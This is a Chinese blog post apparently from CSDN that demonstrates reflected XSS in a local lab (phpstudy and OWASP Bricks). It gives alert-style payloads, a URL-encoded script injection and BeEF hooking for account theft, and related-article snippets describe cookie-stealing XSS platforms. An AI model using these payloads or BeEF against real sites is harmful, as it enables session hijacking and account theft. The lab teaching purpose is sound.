真实环境下xss的实战演练

最新推荐文章于 2024-05-05 14:07:13 发布
最新推荐文章于 2024-05-05 14:07:13 发布
阅读量78 收藏 1
点赞数
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jdk12123/article/details/132768711
版权

真实环境下xss的实战演练

1反射型xss的演示:

1.1环境的本地部署:

这里只是一些基本内容,用到的工具有phpstudy一种而已,具体方法可以参考我的第一次博客,xss的网页源码,均会在这次实战演练中涉及:

源码部分:

1.2最终环境搭建完毕示意图:

请添加图片描述

1.3反射型攻击语句的提交:

‘data’参数发起攻击: mitnick’;alert(‘XSS’);var c=’

请添加图片描述

不需要插入

提交后的源代码

<html><body>
<script>
	var a = '<script>mitnick';alert('XSS');var c='';
	var b = 'other_value';
	document.write('<textarea>' + a + '</textarea>');
</script>
</body></html>

XSS攻击的途径:

<img src==“javascript:alert(‘xss’)” />

1.4BeEF利用xss漏洞(重定向到新的网页)比较危险:

安装beef比较困难,出现问题,因个人原因,大家可以后台私信我。

成功启动beef的界面如下:

请添加图片描述

启动owasp界面如下:

请添加图片描述

传入下列参数:

http://192.168.141.131/owaspbricks/content-2/index.php?user=harry
请添加图片描述

修改下列传参:模拟xss漏洞

http://192.168.141.131/owaspbricks/content-2/index.php?user=harry00%3Cscript%3Ealert(%27xss%27)%3C/script%3E

请添加图片描述

尝试仿制url:

beef可以监听到一些信息

请添加图片描述
beef提交监听,可以实施盗号:
请添加图片描述

NetDefend
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS基础环境及实验演示教程(适合新手)
流浪法师的博客
05-24 1334
花了一点时间,做了一个“XSS基础环境及实验演示教程”,当然教程很简单,适合刚接触和安全行业的小伙伴去认识了解XSS漏洞,并且上手实操。
搭建属于自己的xss平台
m0_60716947的博客
05-03 1万+
一、什么是打 cookie 简单来说就是:在你访问的页面上执行了一次JS代码,这次代码的执行后可以获取你当前已经登录某个网站的cookie ,并将该cookie 发送到攻击者指定的网站,攻击者利用你的cookie 登录你的账号。 攻击者用来接收cookie 的平台就叫做xss 平台,在网上其实有很多这种平台,但其实有的平台存在黑吃黑的现象(懂得都懂),而且有很多渗透测试任务都是保密的,不可能去第三方网站。 二、cookie 接收平台 这里推荐一个平台,BlueLotus_XSSReceiver
2024年XSS基础环境及实验演示教程(适合新手)_xxs实验步骤(1),2024年最新真牛皮
最新发布
2401_84297560的博客
05-05 453
花了一点时间,做了一个“XSS基础环境及实验演示教程”,当然教程很简单,适合刚接触和安全行业的小伙伴去认识了解XSS漏洞,并且上手实操。欢迎各位提出问题和作者v一起交流:tomorrow_me-Kali机器:192.168.2.108Windows机器:192.168.2.105为了中间实验过程方便,有时候会利用一台云服务器辅助,实验过程中出现为显示IP的地址或者不为以上两个IP时,均为云服务器。1在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
渗透测试基础-反射型XSS原理及实操
weixin_45488495的博客
04-17 9145
渗透测试基础-反射型XSS原理及实操XSS是什么漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! XSS是什么 因为人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,将跨站脚本攻击缩写为XSS。这就是XSS名字的由来。XSS攻击是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供
DVWA-XSS (Reflected)-反射型XSS
seanyang_的博客
06-12 3078
XSS攻击,是指攻击者在Web页面中输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页中。如果恶意JavaScript脚本被存储到后端服务器中,用户打开该Web页面时,恶意脚本则可能在浏览器中自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站中有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
反射型 XSS 攻击演示(附链接)
Flag少侠的博客
01-22 2185
反射型 XSS 攻击演示(附链接)
xss-platform.rar
05-27
3. **实战演练**:11个模块涵盖了XSS攻击的常见场景,如反射型XSS、存储型XSS、DOM型XSS等,开发者可以通过实践操作,加深对XSS攻击原理和防范措施的理解。 4. **学习资源**:平台可能还包含了相关的学习资料和教程...
xss-platform-master.zip
04-21
4. 演练环境:模拟真实的Web应用,让学习者实践防御策略。 5. 文档资料:详细解释XSS攻击原理、危害及防范措施。 通过对"xss-platform-master"项目的深入学习,开发者和安全研究人员不仅可以了解XSS攻击的基本概念...
一个用于练习XSS的靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
pikachu漏洞练习环境
10-25
它通常包含了各种模拟真实世界网络应用的靶机和挑战,让用户在安全的环境中进行实战演练。 描述中提到,该环境可以直接部署在Apache服务器的www根目录下,这意味着它可能是一个静态网页或动态网站的集合,通过HTTP...
bWAPP漏洞测试环境.rar
04-06
6. **实战演练**: 在真实环境中,你可以使用bWAPP模拟的漏洞对你的Web应用进行安全审计,找出潜在的安全问题。此外,它还可以作为培训材料,帮助团队成员提升安全意识和技能。 总之,"bWAPP漏洞测试环境.rar"为...
xsser测试平台
12-30
配合phpstudy工具搭建了xsser.me平台,主要用于检测xss漏洞,并对其进行利用
xsser_platform:《 Web安全攻防:渗透测试实战指南》 XSS测试平台原始码
03-23
xsser_platform:《 Web安全攻防:渗透测试实战指南》 XSS测试平台原始码
XSS学习实践全过程!
jklbnm12的博客
09-16 3660
一:什么是XSS攻击? XSS 即(Cross Site Scripting)中文名称为:跨站脚本攻击。XSS的重点不在于跨站点,而在于脚本的执行。那么XSS的原理是:恶意攻击者在web页面中会插入一些恶意的script代码。当用户浏览该页面的时候,那么嵌入到web页面中script代码会执行,因此会达到恶意攻击用户的目的。那么XSS攻击最主要有如下分类:反射型、存储型、及 DOM-based型。 反射性和DOM-baseed型可以归类为非持久性XSS攻击。存储型可以归类为持久性XSS攻击。 二:简单的工具
Web安全攻防 渗透测试实战指南3
jxy191021的博客
04-05 6166
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5个选项,如下
(26)【xss环境搭建一条龙】【pm、bf使用】轻量xss平台、Postman、beef-xss功能模块利用
03-27 3549
xss平台(无数据库)、postman使用、beef使用
XSS环境搭建
糖果不甜的博客
10-05 1832
xss测试平台是测试xss漏洞获取cookie并接收web页面的平台,xss可以做js能做的所有事情,包括但不限于窃取cookie,后台增删文章,钓鱼,利用xss漏洞进行传播,修改的网页代码,网站重定向,获取用户信息(如浏览器信息,ip地址)等,这里使用的是基于xsser。me的源码,可以在网站https://www.ms08067.com/tool.html下载 ...
[ 靶场环境篇 ] XSS-labs 靶场环境搭建(特别详细)
热门推荐
qq_51577576的博客
12-10 1万+
想入门渗透行业呢光有理论基础是不够的,更重要的是实践经验。 接下来我会分享一些入门级靶场,从环境搭建一直到通关教程。 入门级靶场会分享:pikachu、DVWA、XSS-labs、sql-labs、upload-labs等内容。 上篇文章写到了 pikachu 靶场的搭建,本文写 XSS-lab 靶场环境的搭建。 目录 一、环境准备 1 搭建环境 2 下载链接 二、安装教程 1. 首先我们需要搭建好PHP study: 2. 下载 xss-labs 靶场源码 3.解压缩并放入如下..
XSS漏洞自动化攻击工具XSSer
weixin_34018169的博客
08-30 973
2019独角兽企业重金招聘Python工程师标准>>> ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值